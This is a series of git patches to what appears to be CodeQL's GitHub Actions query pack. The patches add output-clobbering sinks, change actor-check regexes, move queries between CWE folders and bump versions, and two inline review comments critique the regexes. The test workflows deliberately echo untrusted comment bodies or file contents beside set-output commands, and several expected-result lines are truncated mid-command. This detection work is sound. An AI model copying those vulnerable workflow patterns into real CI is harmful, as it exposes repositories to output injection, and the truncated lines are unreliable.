@@ -92,6 +92,69 @@ class OutputClobberingFromEnvVarSink extends OutputClobberingSink { } } +/** + * - id: clob1 + * env: + * BODY: ${{ github.event.comment.body }} + * run: | + * # VULNERABLE + * echo $BODY + * echo "::set-output name=OUTPUT::SAFE" + * - id: clob2 + * env: + * BODY: ${{ github.event.comment.body }} + * run: | + * # VULNERABLE + * echo "::set-output name=OUTPUT::SAFE" + * echo $BODY + */ +class WorkflowCommandClobberingFromEnvVarSink extends OutputClobberingSink { + WorkflowCommandClobberingFromEnvVarSink() { + exists(Run run, string output_line, string clobbering_line, string var_name | + run.getScript().splitAt("\n") = output_line and + singleLineWorkflowCmd(output_line, "set-output", _, _) and + run.getScript().splitAt("\n") = clobbering_line and + clobbering_line.regexpMatch(".*echo\\s+(-e\\s+)?(\"|')?\\$(\\{)?" + var_name + ".*") and + exists(run.getInScopeEnvVarExpr(var_name)) and + run.getScriptScalar() = this.asExpr() + ) + } +} + +class WorkflowCommandClobberingFromFileReadSink extends OutputClobberingSink { + WorkflowCommandClobberingFromFileReadSink() { + exists(Run run, string output_line, string clobbering_line | + run.getScriptScalar() = this.asExpr() and + run.getScript().splitAt("\n") = output_line and + singleLineWorkflowCmd(output_line, "set-output", _, _) and + run.getScript().splitAt("\n") = clobbering_line and + ( + // A file is read and its content is assigned to an env var that gets printed to stdout + // - run: | + // foo=$(> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | provenance | | | .github/workflows/output1.yml:30:9:35:6 | Uses Step | .github/workflows/output1.yml:36:14:38:58 | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | provenance | | +| .github/workflows/output2.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | provenance | | +| 
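Review bot: In `WorkflowCommandClobberingFromEnvVarSink` the pattern `".*echo\\s+(-e\\s+)?(\"|')?\\$(\\{)?" + var_name + ".*"` has no boundary after the variable name. With `BODY` in the step's env, a line such as `echo $BODY_LENGTH` also matches, so a different variable that merely shares the prefix is treated as the clobbering print. Ending the name with a word boundary, `+ var_name + "\\b.*"`, keeps the `$BODY`, `"$BODY"` and `${BODY}` forms and drops the prefix matches. The class QLDoc is only a YAML sample; a leading sentence saying that the sink is a run script which both emits a `set-output` workflow command and echoes an in-scope env var would help. The second class in this hunk is truncated on the page and was not reviewed.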
.github/workflows/output2.yml:16:18:16:49 | github.event.comment.body | .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | provenance | | +| .github/workflows/output2.yml:36:9:41:6 | Uses Step | .github/workflows/output2.yml:42:14:46:48 | # VULNERABLE\nPR="$(> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | semmle.label | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | | .github/workflows/output1.yml:30:9:35:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/output1.yml:36:14:38:58 | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | semmle.label | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | +| .github/workflows/output2.yml:9:18:9:49 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | semmle.label | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | +| .github/workflows/output2.yml:16:18:16:49 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | semmle.label | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | +| .github/workflows/output2.yml:36:9:41:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/output2.yml:42:14:46:48 | # VULNERABLE\nPR="$(> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | .github/workflows/output1.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | Potential clobbering of a step output in $@. 
| .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | | .github/workflows/output1.yml:36:14:38:58 | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | .github/workflows/output1.yml:30:9:35:6 | Uses Step | .github/workflows/output1.yml:36:14:38:58 | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | Potential clobbering of a step output in $@. | .github/workflows/output1.yml:36:14:38:58 | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | +| .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | .github/workflows/output2.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | Potential clobbering of a step output in $@. | .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | +| .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | .github/workflows/output2.yml:16:18:16:49 | github.event.comment.body | .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | Potential clobbering of a step output in $@. 
| .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | +| .github/workflows/output2.yml:42:14:46:48 | # VULNERABLE\nPR="$( Date: Wed, 7 Aug 2024 13:21:03 +0200 Subject: [PATCH 0461/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 75b7f0057f7..1edaf464fa5 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.33 +version: 0.1.34 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 4198930865f..044b80d1854 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.33 +version: 0.1.34 groups: [actions, queries] suites: codeql-suites extractor: javascript From e4559e19d8f765c44a0636a7dca0bcb3d612d4c1 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 7 Aug 2024 13:46:27 +0200 Subject: [PATCH 0462/1267] Move Output Clobbering to CWE-074 --- ql/src/Security/{CWE-077 => CWE-074}/OutputClobberingHigh.ql | 4 +--- .../{CWE-077 => CWE-074}/.github/workflows/output1.yml | 0 .../{CWE-077 => CWE-074}/.github/workflows/output2.yml | 0 .../{CWE-077 => CWE-074}/OutputClobberingHigh.expected | 0 .../query-tests/Security/CWE-074/OutputClobberingHigh.qlref | 1 + .../query-tests/Security/CWE-077/OutputClobberingHigh.qlref | 1 - 6 files changed, 2 insertions(+), 4 deletions(-) rename ql/src/Security/{CWE-077 => CWE-074}/OutputClobberingHigh.ql (93%) rename ql/test/query-tests/Security/{CWE-077 => CWE-074}/.github/workflows/output1.yml (100%) rename ql/test/query-tests/Security/{CWE-077 => CWE-074}/.github/workflows/output2.yml (100%) rename ql/test/query-tests/Security/{CWE-077 => CWE-074}/OutputClobberingHigh.expected (100%) create mode 100644 ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.qlref delete mode 100644 ql/test/query-tests/Security/CWE-077/OutputClobberingHigh.qlref diff --git a/ql/src/Security/CWE-077/OutputClobberingHigh.ql b/ql/src/Security/CWE-074/OutputClobberingHigh.ql similarity index 93% rename from ql/src/Security/CWE-077/OutputClobberingHigh.ql rename to ql/src/Security/CWE-074/OutputClobberingHigh.ql index 44199a35210..c53489f9628 100644 --- a/ql/src/Security/CWE-077/OutputClobberingHigh.ql +++ b/ql/src/Security/CWE-074/OutputClobberingHigh.ql @@ -9,9 +9,7 @@ * @tags actions * security * experimental - * external/cwe/cwe-094 - * external/cwe/cwe-095 - * external/cwe/cwe-116 + * external/cwe/cwe-074 */ import actions diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/output1.yml b/ql/test/query-tests/Security/CWE-074/.github/workflows/output1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-077/.github/workflows/output1.yml rename to ql/test/query-tests/Security/CWE-074/.github/workflows/output1.yml 
diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/output2.yml b/ql/test/query-tests/Security/CWE-074/.github/workflows/output2.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-077/.github/workflows/output2.yml rename to ql/test/query-tests/Security/CWE-074/.github/workflows/output2.yml diff --git a/ql/test/query-tests/Security/CWE-077/OutputClobberingHigh.expected b/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-077/OutputClobberingHigh.expected rename to ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.expected diff --git a/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.qlref b/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.qlref new file mode 100644 index 00000000000..1e8b050bb9d --- /dev/null +++ b/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.qlref @@ -0,0 +1 @@ +Security/CWE-074/OutputClobberingHigh.ql diff --git a/ql/test/query-tests/Security/CWE-077/OutputClobberingHigh.qlref b/ql/test/query-tests/Security/CWE-077/OutputClobberingHigh.qlref deleted file mode 100644 index 5af047eec9e..00000000000 --- a/ql/test/query-tests/Security/CWE-077/OutputClobberingHigh.qlref +++ /dev/null @@ -1 +0,0 @@ -Security/CWE-077/OutputClobberingHigh.ql From b251c661f838a3a62ba85e6ad9c9ef26a0984858 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 7 Aug 2024 13:46:50 +0200 Subject: [PATCH 0463/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 1edaf464fa5..0d53b48ef11 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.34 +version: 0.1.35 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 
diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 044b80d1854..ade19bd63ee 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.34 +version: 0.1.35 groups: [actions, queries] suites: codeql-suites extractor: javascript From 1750ebac18b8a96fa0a23b62079e71744782f90d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 7 Aug 2024 17:09:50 +0200 Subject: [PATCH 0464/1267] fix(controlcheck): Improve checks for actors --- .../codeql/actions/security/ControlChecks.qll | 16 ++++-- .../CWE-074/.github/workflows/output2.yml | 8 ++- .../CWE-074/OutputClobberingHigh.expected | 3 ++ .../CWE-829/.github/workflows/dependabot3.yml | 52 +++++++++++++++++++ .../UntrustedCheckoutCritical.expected | 4 ++ 5 files changed, 77 insertions(+), 6 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot3.yml diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index 90a989c1a16..2d8e60dca37 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll 
@@ -122,17 +122,23 @@ class LabelIfCheck extends LabelCheck instanceof If { class ActorIfCheck extends ActorCheck instanceof If { ActorIfCheck() { - // eg: github.actor == 'dependabot[bot]' - // eg: github.triggering_actor == 'CI Agent' - // eg: github.event.pull_request.user.login == 'mybot' + // eg: github.event.pull_request.user.login == 'admin' exists( normalizeExpr(this.getCondition()) .regexpFind([ - "\\bgithub\\.actor\\b", "\\bgithub\\.triggering_actor\\b", - "\\bgithub\\.event\\.comment\\.user\\.login\\b", "\\bgithub\\.event\\.pull_request\\.user\\.login\\b", + "\\bgithub\\.event\\.head_commit\\.author\\.name\\b", + "\\bgithub\\.event\\.commits.*\\.author\\.name\\b" ], _, _) ) + or + // eg: github.actor == 'admin' + // eg: github.triggering_actor == 'admin' + exists( + normalizeExpr(this.getCondition()) + .regexpFind(["\\bgithub\\.actor\\b", "\\bgithub\\.triggering_actor\\b",], _, _) + ) and + not normalizeExpr(this.getCondition()).matches("%[bot]%") } } diff --git a/ql/test/query-tests/Security/CWE-074/.github/workflows/output2.yml b/ql/test/query-tests/Security/CWE-074/.github/workflows/output2.yml index fa2375d73f8..614de61b0cb 100644 --- a/ql/test/query-tests/Security/CWE-074/.github/workflows/output2.yml +++ b/ql/test/query-tests/Security/CWE-074/.github/workflows/output2.yml @@ -49,8 +49,14 @@ jobs: # VULNERABLE cat pr-number echo "::set-output name=OUTPUT::SAFE" - - id: clob2 + - id: clob3 run: | # VULNERABLE echo "::set-output name=OUTPUT::SAFE" ls *.txt + - id: clob4 + run: | + # VULNERABLE + CURRENT_VERSION=$(cat gradle.properties | sed -n '/^version=/ { s/^version=//;p }') + echo "$CURRENT_VERSION" + echo "::set-output name=OUTPUT::SAFE" diff --git a/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.expected b/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.expected index 72eb314cb32..b6cb2a32e47 100644 --- a/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.expected 
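Review bot: `ActorIfCheck` now accepts conditions on `github.event.head_commit.author.name` and `github.event.commits.*.author.name`, but a git commit author name is free-form metadata chosen by whoever creates the commit, not an authenticated GitHub identity. If `ActorCheck` is used to treat guarded steps as protected (its consumers are outside the hunk), an `if:` on these fields would suppress findings for a check the commit author controls. I would drop the two patterns, or model them as a separate, weaker check. Separately, `and` binds tighter than `or`, so `not normalizeExpr(this.getCondition()).matches("%[bot]%")` applies only to the `github.actor` / `github.triggering_actor` branch. A comparison of `github.event.pull_request.user.login` with a `[bot]` login still counts as an actor check, so add parentheses or a comment stating which is intended.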
+++ b/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.expected @@ -6,6 +6,7 @@ edges | .github/workflows/output2.yml:36:9:41:6 | Uses Step | .github/workflows/output2.yml:42:14:46:48 | # VULNERABLE\nPR="$(> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | semmle.label | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | @@ -19,6 +20,7 @@ nodes | .github/workflows/output2.yml:42:14:46:48 | # VULNERABLE\nPR="$(> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | .github/workflows/output1.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | Potential clobbering of a step output in $@. | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | @@ -28,3 +30,4 @@ subpaths | .github/workflows/output2.yml:42:14:46:48 | # VULNERABLE\nPR="$(> $GITHUB_OUTPUT + fi + env: + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + + - name: Merge Dependabot pull request + if: steps.set-milestone.outputs.mergeEnabled + run: gh pr merge ${{ github.event.pull_request.number }} --auto --rebase + env: + GH_TOKEN: ${{ secrets.GH_ACTIONS_REPO_TOKEN }} diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 93e816fe1f9..d5ad134c976 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
@@ -59,6 +59,9 @@ edges | .github/workflows/dependabot2.yml:47:9:52:6 | Run Step | .github/workflows/dependabot2.yml:52:9:58:6 | Run Step | | .github/workflows/dependabot2.yml:52:9:58:6 | Run Step | .github/workflows/dependabot2.yml:58:9:61:6 | Run Step | | .github/workflows/dependabot2.yml:58:9:61:6 | Run Step | .github/workflows/dependabot2.yml:61:9:68:19 | Run Step | +| .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:20:9:25:6 | Uses Step | +| .github/workflows/dependabot3.yml:20:9:25:6 | Uses Step | .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | +| .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | .github/workflows/dependabot3.yml:48:9:52:57 | Run Step | | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:18:11:21:8 | Uses Step | | .github/workflows/gitcheckout.yml:18:11:21:8 | Uses Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | | .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | .github/workflows/issue_comment_3rd_party_action.yml:16:9:22:2 | Uses Step | 
@@ -153,6 +156,7 @@ edges | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | Execution of untrusted code on a privileged workflow. | | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow. | From 8ebe76668cd59844966e20cb7626f763545c4ee8 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 7 Aug 2024 17:24:59 +0200 Subject: [PATCH 0465/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) 
diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 0d53b48ef11..d9889fb0869 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.35 +version: 0.1.36 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index ade19bd63ee..9b4795a0d8a 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.35 +version: 0.1.36 groups: [actions, queries] suites: codeql-suites extractor: javascript From f4f18f38ccb4cf89865dce475526bf143a37e800 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 9 Aug 2024 17:04:32 +0200 Subject: [PATCH 0466/1267] Move Argument injection queries to its own CWE --- .../{CWE-094 => CWE-088}/ArgumentInjectionCritical.ql | 4 +--- .../Security/{CWE-094 => CWE-088}/ArgumentInjectionMedium.ql | 4 +--- .../{CWE-094 => CWE-088}/.github/workflows/arg_injection.yml | 0 .../{CWE-094 => CWE-088}/ArgumentInjectionCritical.expected | 0 .../Security/CWE-088/ArgumentInjectionCritical.qlref | 1 + .../{CWE-094 => CWE-088}/ArgumentInjectionMedium.expected | 0 .../Security/CWE-088/ArgumentInjectionMedium.qlref | 1 + .../Security/CWE-094/ArgumentInjectionCritical.qlref | 1 - .../Security/CWE-094/ArgumentInjectionMedium.qlref | 1 - 9 files changed, 4 insertions(+), 8 deletions(-) rename ql/src/Security/{CWE-094 => CWE-088}/ArgumentInjectionCritical.ql (89%) rename ql/src/Security/{CWE-094 => CWE-088}/ArgumentInjectionMedium.ql (89%) rename ql/test/query-tests/Security/{CWE-094 => CWE-088}/.github/workflows/arg_injection.yml (100%) rename ql/test/query-tests/Security/{CWE-094 => CWE-088}/ArgumentInjectionCritical.expected (100%) create mode 100644 ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.qlref rename ql/test/query-tests/Security/{CWE-094 => CWE-088}/ArgumentInjectionMedium.expected (100%) create mode 100644 ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.qlref delete mode 100644 ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.qlref delete mode 100644 ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.qlref diff --git a/ql/src/Security/CWE-094/ArgumentInjectionCritical.ql b/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql similarity index 89% rename from ql/src/Security/CWE-094/ArgumentInjectionCritical.ql rename to ql/src/Security/CWE-088/ArgumentInjectionCritical.ql index e56f613fac4..affa372f14e 100644 --- a/ql/src/Security/CWE-094/ArgumentInjectionCritical.ql +++ b/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql 
@@ -8,9 +8,7 @@ * @id actions/argument-injection/critical * @tags actions * security - * external/cwe/cwe-094 - * external/cwe/cwe-095 - * external/cwe/cwe-116 + * external/cwe/cwe-088 */ import actions diff --git a/ql/src/Security/CWE-094/ArgumentInjectionMedium.ql b/ql/src/Security/CWE-088/ArgumentInjectionMedium.ql similarity index 89% rename from ql/src/Security/CWE-094/ArgumentInjectionMedium.ql rename to ql/src/Security/CWE-088/ArgumentInjectionMedium.ql index 66c51ae3673..fa5b750fd89 100644 --- a/ql/src/Security/CWE-094/ArgumentInjectionMedium.ql +++ b/ql/src/Security/CWE-088/ArgumentInjectionMedium.ql @@ -8,9 +8,7 @@ * @id actions/argument-injection/medium * @tags actions * security - * external/cwe/cwe-094 - * external/cwe/cwe-095 - * external/cwe/cwe-116 + * external/cwe/cwe-088 */ import actions diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml b/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml rename to ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml diff --git a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected rename to ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected diff --git a/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.qlref b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.qlref new file mode 100644 index 00000000000..e36c9c6f3e8 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.qlref @@ -0,0 +1 @@ +Security/CWE-088/ArgumentInjectionCritical.ql 
diff --git a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected rename to ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected diff --git a/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.qlref b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.qlref new file mode 100644 index 00000000000..afc26233870 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.qlref @@ -0,0 +1 @@ +Security/CWE-088/ArgumentInjectionMedium.ql diff --git a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.qlref b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.qlref deleted file mode 100644 index 6b3e2fd9f62..00000000000 --- a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.qlref +++ /dev/null @@ -1 +0,0 @@ -Security/CWE-094/ArgumentInjectionCritical.ql diff --git a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.qlref b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.qlref deleted file mode 100644 index b9c4ae95e43..00000000000 --- a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.qlref +++ /dev/null @@ -1 +0,0 @@ -Security/CWE-094/ArgumentInjectionMedium.ql From 9977f25f0f4ac6d990aca4eb3423a94e48bfe244 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 9 Aug 2024 17:05:17 +0200 Subject: [PATCH 0467/1267] Move some queries to experimental --- ql/src/Security/CWE-078/CommandInjectionCritical.ql | 1 + ql/src/Security/CWE-078/CommandInjectionMedium.ql | 1 + ql/src/Security/CWE-200/SecretExfiltration.ql | 1 + ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql | 3 +-- ql/src/Security/CWE-918/RequestForgery.ql | 1 + 5 files changed, 5 insertions(+), 2 deletions(-) 
diff --git a/ql/src/Security/CWE-078/CommandInjectionCritical.ql b/ql/src/Security/CWE-078/CommandInjectionCritical.ql index 68942478284..f5a4aed3eca 100644 --- a/ql/src/Security/CWE-078/CommandInjectionCritical.ql +++ b/ql/src/Security/CWE-078/CommandInjectionCritical.ql @@ -9,6 +9,7 @@ * @id actions/command-injection/critical * @tags actions * security + * experimental * external/cwe/cwe-078 */ diff --git a/ql/src/Security/CWE-078/CommandInjectionMedium.ql b/ql/src/Security/CWE-078/CommandInjectionMedium.ql index 5feacedc40b..8e7d72dded9 100644 --- a/ql/src/Security/CWE-078/CommandInjectionMedium.ql +++ b/ql/src/Security/CWE-078/CommandInjectionMedium.ql @@ -9,6 +9,7 @@ * @id actions/command-injection/medium * @tags actions * security + * experimental * external/cwe/cwe-078 */ diff --git a/ql/src/Security/CWE-200/SecretExfiltration.ql b/ql/src/Security/CWE-200/SecretExfiltration.ql index a6d1c18b733..2e583a98989 100644 --- a/ql/src/Security/CWE-200/SecretExfiltration.ql +++ b/ql/src/Security/CWE-200/SecretExfiltration.ql @@ -8,6 +8,7 @@ * @id actions/secret-exfiltration * @tags actions * security + * experimental * external/cwe/cwe-200 */ diff --git a/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql b/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql index b32fe406877..9610302d1c2 100644 --- a/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql +++ b/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql @@ -8,9 +8,8 @@ * @id 